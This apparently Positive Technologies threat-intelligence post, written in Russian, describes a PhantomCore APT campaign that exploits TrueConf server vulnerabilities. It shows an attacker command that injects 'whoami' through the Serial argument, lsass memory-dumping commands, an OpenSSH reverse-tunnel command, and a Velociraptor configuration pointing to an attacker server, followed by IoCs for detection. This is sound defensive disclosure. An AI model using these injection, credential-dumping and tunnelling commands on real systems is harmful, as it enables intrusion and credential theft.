Operation CyberPosi 🤔

Ещё в группе «Общее»
- Операция Chewbacca
В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…
- Din, din — кто там?
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку,…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) Автор десятка троянов, забывший добавить "Enterprise-grade" обфускацию Мы обнаружили…
- Минус один пернатый вор — плюс сто очков рейтинга!
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности…
- DragonDoll: матрешка в мире Android-шпионов
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее…
Operation CyberPosi 🤔
Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи TrueConf.
Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были выпущены рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security в своем материале.
👀 Пример выполнения команды после эксплуатации от имени процесса tc_server.exe:
cmd.exe /s /c "C:\\Program Files\\TrueConf Server\\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||whoami|| /File:"C:\\TrueConf\\activation\\offlinereg.vrg"Code language: plaintext (plaintext)
Пример события в журналах для обнаружения фактов компрометации:
error: the required argument for option '--Serial' is missingCode language: YAML (yaml)
Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.
После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления WinRM и RDP. Использование WinRM можно мониторить в событиях Windows, а также в реестре:
Microsoft\Windows\CurrentVersion\WSMAN\SafeClientList\WSManSafeClientListCode language: plaintext (plaintext)
Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса lsass, используя для этого такие инструменты, как:
• DFIR-утилита для создания дампа оперативной памяти DumpIt (DumpIt.exe /O dump.dmp)
• библиотека файловой системы Dokan
• утилита для анализа дампов оперативной памяти MemProcFS (memprocfs.exe -device dump.dmp / M:\name\lsass.exe-123\minidump)
На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:
• HeartDoor
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)
• PhantomSscp (предназначен для создания обратного SSH-туннеля)
• OpenSSH (ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 [REDACTED]@[REDACTED])
• Velociraptor
Особое внимание мы обращаем на установку утилиты Velociraptor, которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими сообщали специалисты Solar 4RAYS.
Пример конфигурации:
version:
name: velociraptor
version: 0.74.2
commit: 121178eb6
build_time: "2025-04-20T01:04:04Z"
...
Client:
server_urls:
- https://telecom-connect.online/
windows_installer:
service_name: WindowsSecurityAgentSvc
install_path: C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
service_description: Windows Security Agent Service
...Code language: YAML (yaml)
🐾 Paths
c:\Windows\ime\ssh.msi
c:\Windows\ime\k.msi
C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css
C:\Program Files\TrueConf Server\httpconf\site\public\rx.exe
C:\Program Files\TrueConf Server\httpconf\site\public\ws.dll
C:\TrueConf\activation\offlinereg.vrg
C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
C:\Windows\System32\dfxhost.dll
Check-Update.xml
Check-Update.ps1
Create-Check-Update-Task.ps1
🧑💻 IoCs
HeartDoor
8f2f31aaa46920efdfa622b52cd8cd53
fde9563317a0c0249447b123b2137b0e
185.189.12.166
PhantomSscp
e5b540f47ec1707fcd9980ab426be115
4b2ce3df0bae02806a72139b5d9e9a55
486faa9e2efbf78d4c03ba5dfe72eb1d
99ef13d85d2b45cb24a86f1e9923d63a
reserve-safe.online
online-channel.online
infonixsecurity.online
xbox-updater.online
MacTunnelRAT
a346f2145bb7b3cce7c8c8c4d88d4678
c549a2e6533e73ea39bfa466e5e6dcd8
ad64f8c8469c87ed0c395c8936550af6
cyberposi.space
nexaguard.space
solution-itspace.online
moscow-tv.online
analytisec.space
safebloom.space
cloud-update.online
shieldify.online
optivault.space
brightshield.space
trustbeam.space
188.127.227.46
Velociraptor
d91f8fb7ee4ec98bd80bad69d7667842
telecom-connect.online
Stage Hub
31.57.93.105
SSH Tunnel Control Panel
77.73.39.120
191.101.184.123
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
Ещё в группе «Общее»
- Операция Chewbacca
В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…
- Din, din — кто там?
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку,…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) Автор десятка троянов, забывший добавить "Enterprise-grade" обфускацию Мы обнаружили…
- Минус один пернатый вор — плюс сто очков рейтинга!
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности…
- DragonDoll: матрешка в мире Android-шпионов
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее…






